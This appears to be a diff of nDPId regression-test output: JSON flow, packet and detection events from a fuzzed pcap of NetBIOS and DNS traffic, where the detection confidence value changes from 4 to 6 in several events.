00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1120469540839} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1120469540839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469540839,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaYwAAIARTMHAqAECwKgB\/wCJAIkAOlu0hOcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPU0FDQUNBQ0FDQUJNAAAgAAE="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469540839,"flow_last_seen":1120469540839,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469540839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1120469541585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469541585,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaYkAAIARTMDAqAECwKgB\/wCJAIkAOlu0hOcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAA2AAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469542336,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1120469542336,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120469542336,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOaY4AAIARA7\/ZqAECwKgB\/wCJAIkAOlu0hOcBEAABaQAAAAAAIEVGRURFSkZQRUVFUEVORUIFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1120469551656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469551656,"pkt":"ADBUMjQlcwDtAW69CABFAAA+aY8AAIARTczAqAECwKgBAQqYADUAKiNDstABAAABAAAAAADPA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469551656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1120469552651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469552651,"pkt":"ADBUADRWAODtAW69CABFAAA+aZAAAIARTcvAqAECwCVzAAqYADUCKiNDstABAAABAAAAAAAAA3NpcAljeWJlcmNydHkCZGsAAAEAAQ=="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercrty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469552651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercrty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1120469554654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1120469554654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1120469554654,"pkt":"ADBUADRWAODtAW51CABFAAA+aZEAAIARlcrAqAECwKgBAQqYwzUAKiNDstABAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1120469554824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":144,"pkt_l4_len":110,"thread_ts_msec":1120469554824,"pkt":"AODtAW69ADBUADRWCABFAACCAABAAEARtxfAqAEDwKgBAgA1CpgAbjxwstCBgAABAAEAAgABA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQBAASwABNTyISPAEAACAAEAAACJAAYDbnMywBDAEAACAAEAAACJAAYDbnMxwBDAUAABAAEAAACJAATU8in4"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":4,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":200000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1120469554824,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":4,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1120469555830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469555830,"pkt":"ADBUADRWAODtAW69CABFAABIaZIAAIARTb\/AqAECwKgBAQqZADUANN1ZTNIBAAABAAAAACWHAF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":24435,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469555830,"flow_last_seen":1120469555830,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469555830,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":24435,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1120469556827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69CABFAABIaZMAAIARTb7AqAFuwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5JXMAJXMAAAE="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469556827,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":9587,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":27904,"global_ts_msec":1120469558830} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":27904,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469556827,"pkt":"ADBUADRWAODtAW69bQBFAABIaZQAAIARTb3QqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAMX3VkcINzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469560833,"flow_last_seen":1120469560833,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469560833,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2597,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1120469560833,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469560833,"pkt":"ADBUADRWAODtAW69CABFAABIaZUAAIARTbzAqAECwKgBAQolcwAANN9ZTE4BAAABACVzAAAABF9zaXAEX1VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1120469564839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469564839,"pkt":"ADBUADRWAODtAW69CABFAABIaZYAAIARTbvAqAECwKgBAQqZADUANN1ZTNIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469564839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469555830,"flow_last_seen":1120469564839,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469564839,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1120469572841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469572841,"pkt":"ADBUADRWAODtAW69CABFAABEaZcAAIARTb7AqAECwKgBAQqaADUAMHlSV9IAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572841,"flow_last_seen":1120469572841,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469572841,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2714,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1120469572842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469572842,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CpoAR1vOq9KAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3RP"} 